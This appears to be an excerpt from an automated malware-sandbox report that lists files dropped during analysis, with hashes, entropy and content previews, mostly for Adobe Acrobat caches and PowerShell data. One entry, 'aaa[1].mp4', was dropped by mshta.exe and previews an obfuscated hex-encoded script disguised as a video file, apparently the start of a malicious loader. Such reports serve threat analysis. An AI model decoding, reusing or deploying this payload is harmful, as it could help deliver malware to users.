                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf8dPeUkwRe9:YvXKX43sMsdTeO6anGU8Ukee9
                                                                      MD5:F23FC057E4A4AE55F16E27C1D520F2FC
                                                                      SHA1:1E314B7CDAC1735D6B7EE408E4B5EAF6CB87700A
                                                                      SHA-256:F2EFE07B0EBEA3C60257EDDDF2A7EFFB47C57336A8F4E742A185F5266A596227
                                                                      SHA-512:C65F6E2C1D17CDC02A4E937E89FEAB49ED319F08F896C5F598B59A762639B1344572BE64B6847D219D4A8695C8AF5AE18EAA5CF90FFD70E4B8420277330DE570
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.319192625025622
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfQ1rPeUkwRe9:YvXKX43sMsdTeO6anGY16Ukee9
                                                                      MD5:6BA54AE3FFCE6B7FF4F92FAAA942DD61
                                                                      SHA1:F9331F5AAA51669F61088939E640744BD840E7C4
                                                                      SHA-256:63854316219248003242E45A76A9719B60280ACBCC07635398CBE77A3302B7B2
                                                                      SHA-512:FA8C858898F766705BBE040753F06A365D74DF7FB25EF491C7B85B21CA4BEE70C86B6DC3AF913675DCA8900589C2A7AC4740743E3C92BE348457D200255E43C5
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.33476035936328
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfFldPeUkwRe9:YvXKX43sMsdTeO6anGz8Ukee9
                                                                      MD5:4621A64C3F9DD3A7E0D8E251BF3BD061
                                                                      SHA1:948A6738C086F2365B52EC36356B6C9B42263B40
                                                                      SHA-256:CB0EB93FD2906F8727C9AE07405D41BA5F5E545A5A3108CDF61203158D734D9B
                                                                      SHA-512:5AA4E9E933DB0B3A1D2B9382595BCFC6B75E025D1AD1EC5CB92BDD05C99FAC0DAA9DC0F21700902FF8C0151F22E613114118674D1B4F66BB9AB7F2BF29E46635
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.341713737479764
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfzdPeUkwRe9:YvXKX43sMsdTeO6anGb8Ukee9
                                                                      MD5:7CA2BB4997BE1066727C022021B47C9D
                                                                      SHA1:7F96F542D83CF8B4963962B9C2E0DEB7F926AA06
                                                                      SHA-256:2A435C84B2C4E9DB5708110A3700A0C71C06D55D917CE6687EB204A65318F444
                                                                      SHA-512:0A04F5D2FD5320480C9F7C032230DE471F543468EC54F102B80D42818EB5E7082E893A2E11A0B278E6D581BFCB11E8D45D734433F4D7F5EBEE8CAC81D1F7FA43
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.322821496514238
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfYdPeUkwRe9:YvXKX43sMsdTeO6anGg8Ukee9
                                                                      MD5:7AE8800A4FA1FD2B8B1CB9BC28C474D7
                                                                      SHA1:9171CBF885C7911C092A0E09125BFC4E0578E984
                                                                      SHA-256:CED1CE8A8D4620A7FA33E8C8F059F81D65EC3E8A78408A113B7FC0C0C2B37479
                                                                      SHA-512:0481F182B0D8D617A48C88BAA6690EB817B23E163B10BC70DFA866C816E4E559D6E8AFB503BF76A54A314DF1C6BC69BB087F2A647C25E4705E9F07CCC373381D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):284
                                                                      Entropy (8bit):5.308955954714532
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf+dPeUkwRe9:YvXKX43sMsdTeO6anG28Ukee9
                                                                      MD5:E168020A039F89F75D79B10535BFFE32
                                                                      SHA1:06053AA12CBA26402BDB8F7DED1F7CEEDAAC5C3B
                                                                      SHA-256:2AA80D5F4A2C61B83C9D7424F55A11CE912C588D36BA99502C19A2A8F8A39E8A
                                                                      SHA-512:389A27E1A63F093DDD00AD4D139751220416DBF539AB5579106FB40F62086DE55700C28E231DB905487831FE47CA3C01E9C788BDD283F719820C39F9D2F469FD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):291
                                                                      Entropy (8bit):5.3062117454148074
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfbPtdPeUkwRe9:YvXKX43sMsdTeO6anGDV8Ukee9
                                                                      MD5:CD3987385D474BE6C1DF31D77D80CCEB
                                                                      SHA1:8E825F2F9F63362EA5AB725E218D676B09B6E2A8
                                                                      SHA-256:FDAB322CAFAFE125CB9A2FCC2AAFCBCA0DB8C55AEA110708097783A16FEFE8B2
                                                                      SHA-512:A18C2B317016348AFF2AB8E77EFDFFC2F88CDFCB622597F765C55806E6B250B191FEA2CEC8AEAE502B467E55A7E909C4A2078DD56F3A5EAC41E1134A9CE4F508
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):287
                                                                      Entropy (8bit):5.311179081643241
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf21rPeUkwRe9:YvXKX43sMsdTeO6anG+16Ukee9
                                                                      MD5:79C3ACEE8A8BC0815883E6BE9F3A10C9
                                                                      SHA1:50D56E9039B89AB67ACB7FE6FCA5EA271F51AC26
                                                                      SHA-256:DD77AC569054879124F9D217EE0161DF9FC95345FF610386C46AB6EDD9A46C5C
                                                                      SHA-512:B14000FF6D641BD6814361188EE6D721669D916F356B3B6523F71B6560331E8766915A00F8DE98769D756927362316734FAAF0CD9E71A6466F4C04F8AFE81BAC
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1090
                                                                      Entropy (8bit):5.663043833134792
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6X43sMmeOuamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSE5:YvXUepBgkDMUJUAh8cvME5
                                                                      MD5:ED2E4EB0870EC273AFA1CD19223CB8AA
                                                                      SHA1:B39825ADBD5DD725088670A264A427A7AC9CBF2F
                                                                      SHA-256:5EE05027A7EC5F137A31746AED9F510A40532F97C8A9EDD70A94C4230D0AB146
                                                                      SHA-512:FC46270CCB2DC5B1AB71D74364373A5F00091EEC855D79ECB1DE03BEEF6DBD09F0A472BB8661921A72947CCB89D7EC7AEA1871F3C196CBF0E774D4391B733F0E
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.286288399205933
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfshHHrPeUkwRe9:YvXKX43sMsdTeO6anGUUUkee9
                                                                      MD5:A4D83DD73094F5280AA0A2F63BFD5A37
                                                                      SHA1:CA98EA6E9AC8DAB6C864DD91E434A89D3579F07A
                                                                      SHA-256:95A10BF91ADB658021DE6CF95154D56A984BB1C62BDA177F77204DDB7302F344
                                                                      SHA-512:B5EC48DE30798E4A9953428C9F33602413EAA464574626F4978393FB7038FA9395E0B0EFA4621C63ABFEB698E6B8648A3FF9BC5E2FE5AE1579ED99076B38A71A
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):282
                                                                      Entropy (8bit):5.301373598626118
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJTqgFCrPeUkwRe9:YvXKX43sMsdTeO6anGTq16Ukee9
                                                                      MD5:EE185CAA6DE707284DBAC74935F22510
                                                                      SHA1:2402F029D8E443BDA7067B84DDC886AE4CED6689
                                                                      SHA-256:1166C74EAC441FBB0E089EFF7594630F5DF1177399B9032F4F72BF0D89A62C1A
                                                                      SHA-512:51B7B60833D4464D0CCFD3085CAD1B8C9B60510BE05729C2F8F52F24C84C5DFC6E8900E0F885D9EFE353308A837EC11433BD3BA1906847C0644B20F0C2BDDBFD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Preview:....

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2814
                                                                      Entropy (8bit):5.143867690477688
                                                                      Encrypted:false
                                                                      SSDEEP:24:YNWwL4atUaySb9HvmGE6zHRX6uELVWmLwGQWVjI7zBsj0SQi0PHYD0nv2yPy2LSS:YNrXN68/wW+sQDOJy/Qx4yHGAh9tGC
                                                                      MD5:0F5F408000F0D52B54CA29D3CDE652BA
                                                                      SHA1:1B32349A74B03F622650F98BD014B27EA64318B1
                                                                      SHA-256:565A15D39039990DA3668BA633E4141C8125561D6A65813123FFFD0D83683F74
                                                                      SHA-512:A3161D6004D33544AA1E7F7775020DFC611DB9370F78CB164739DBA3C449C01132AE0B802F191CC8F3C858C25F7D2739E0E7C144FBFD54A8E39B1F6635AADDEC
                                                                      Malicious:false
                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4bcc01950914774879f175861ef69a5d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735290486000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c88ae6300812c73e8d0ee0e534f01ddd","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735290486000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7a017d6260d78fd34e507c0b606038ab","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735290486000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dd64734b0987de609e3658919aa00690","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735290486000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"7fa9c6250ccdb42fe6995a24396e8975","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735290486000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"54ef741408286f28f22e0184473a5dc4","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):1.4526681512947004
                                                                      Encrypted:false
                                                                      SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsU3qOly3qo:lNVmsw3SHtbDbPe0K3+fDZd3aV
                                                                      MD5:24477D415280D9E92F933DEFF283FF33
                                                                      SHA1:AD4146C65F5E9ACB0793D656CA6B61BCF1D8ED81
                                                                      SHA-256:72BBCDA49E2FDA130C679A20FC05AD6977B790E81302EBE2F9F04A6C6B294491
                                                                      SHA-512:70669782DAE71CEF6D175C34A6D9EC292C45956145521230DCFB6D22449CC4544C110B514D529996FF17B2465E4A96722EC561E847970E0A1EB18834BEE98864
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.9584263586487158
                                                                      Encrypted:false
                                                                      SSDEEP:48:7MyrvrBd6dHtbGIbPe0K3+fDy2dsU3q/3qFl2GL7msO:7D3SHtbDbPe0K3+fDZd3gKVmsO
                                                                      MD5:30C1BB9678068385217E8119EA181F5F
                                                                      SHA1:1450112534AEF9DB4170358229F459BC84629A9B
                                                                      SHA-256:2311771B66F81C9D57CA80B6AAE5AFDD1D7A1850D9290515CD5B2B8C1BE1FB72
                                                                      SHA-512:1261AFFC28631EA22F19CADE5806AE75BD474E5F987BE8D50692CEDB47028A9EF8D94F26E03772605C1ED6B92D342D8082FE53181979C15B998BC71F5B8D51AC
                                                                      Malicious:false
                                                                      Preview:.... .c......*}N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):66726
                                                                      Entropy (8bit):5.392739213842091
                                                                      Encrypted:false
                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgWbjZndAdNVYxXRdOPP3Ea29gYyu:6a6TZ44ADEWbjZGdHY5RdyBK
                                                                      MD5:156C6C333F9C7CB9D6D0300077B91474
                                                                      SHA1:3B4939645E720F7D98ED39830B68E4C33A4C5111
                                                                      SHA-256:0933300D634C180CF95141AEA76B6BCDCC4AED21746E5AF51119A58480E173A1
                                                                      SHA-512:F39635E12250D9F14CA80E271B1D29E671A053E58C80E328AD5B60D0C42AFDA73C917255CA4629A5B2155D4F6C816E96017CD0761C6CAE9DB3B0844BE311C611
                                                                      Malicious:false
                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\aaa[1].mp4

                                                                      Download File
                                                                      Process:C:\Windows\System32\mshta.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):497355
                                                                      Entropy (8bit):6.2697576364001515
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YUT2/hKdAxeNSYneIelFeYU3+ejQdefeFdAepSjUbeXeTkeMe/:v0hKq
                                                                      MD5:CB3ECBABD5A956664E03CBE4270418C6
                                                                      SHA1:6B7915B233B5E30C8B6ACA23013735A9F33DDA3F
                                                                      SHA-256:9355A7BC59AF4AB0AE04ABE2EAE7984BCEDE654F5E46302686F381E678D20615
                                                                      SHA-512:53AEEB6F6AF1BF767FF6C303DB786B91BA0B4A8F8DFCAFF44935FE8F5642D594ACA39BBC8229B8971C033A158BFE0880541CA158EEB88BF29BE2CCE1AAA0947C
                                                                      Malicious:false
                                                                      Preview:66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF29I7bB76w61q72Z20R56k58o58R5aL6bm68o20N3dX20V53m74j72L69B6eP67B2ew66g72d6fu6dx43c68o61H72h43r6fn64Z65K28j76s71D73x55I43c5bf6cP65w51s43s61H5dI20v2df20e39O32W31X29S3bD50M4eV72T65v6fb79o20v3dh20k50U4ey72O65D6fn79d20i2bm20D56Y58k58l5az6bo68l7dn72o65g74J75c72S6eU20Q50H4eG72X65X6fk79B7dg3bo76j61h72M20X50t4es72F65I6fC79v20c3dT20y69h68S71N4ch6ei28I5bn31H30m33F33R2cA31h30H33w32Q2cF31y30l34W30k2cA31E30m32Q32r2cu31i30Y33H35h2cq31A30R33Z36o2cJ31p30B32s35t2cg31x30c32v32X2cL31l30I32r39w2cx31r30x32O39h2cN39a36Q37r2cN31E30j32e32Y2ca31z30Q34h31I2cG31P30w32s32d2cE39D35b33r2ct39f36J36a2ch31L30j34z30D2cD39s35a33j2cZ39K37e30p2cx39S35E33U2cX39v36D36A2ck31g30A32y32T2cJ31d30m33j33X2cL39E35d33B2cT31o30b30v36M2co31i30X33q31l2cN31o30H33k35W2cX31V30j32F32Z2cw31f3

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):11887
                                                                      Entropy (8bit):4.901437212034066
                                                                      Encrypted:false
                                                                      SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                                      MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                                      SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                                      SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                                      SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\MSIb9645.LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5162684137903053
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87kwCH:Qw946cPbiOxDlbYnuRKTl
                                                                      MD5:2B8AC352D5918C0ABD844B07E3B7647C
                                                                      SHA1:EB4C4827CE0A1B76F41BD5508BF2F4630C4F77B9
                                                                      SHA-256:0DE52E6D9E809B7F68771203E51ECD942C49C12226B87212E23AF2F9D8FE4C03
                                                                      SHA-512:D16DCBDD07659129491C96E7EF31ED8001A7F67453A99070084980C898297596D96223FE99E6D03B25A6AD21150BD7194EFFA502B00CF3A4680BE6F5A5E09D16
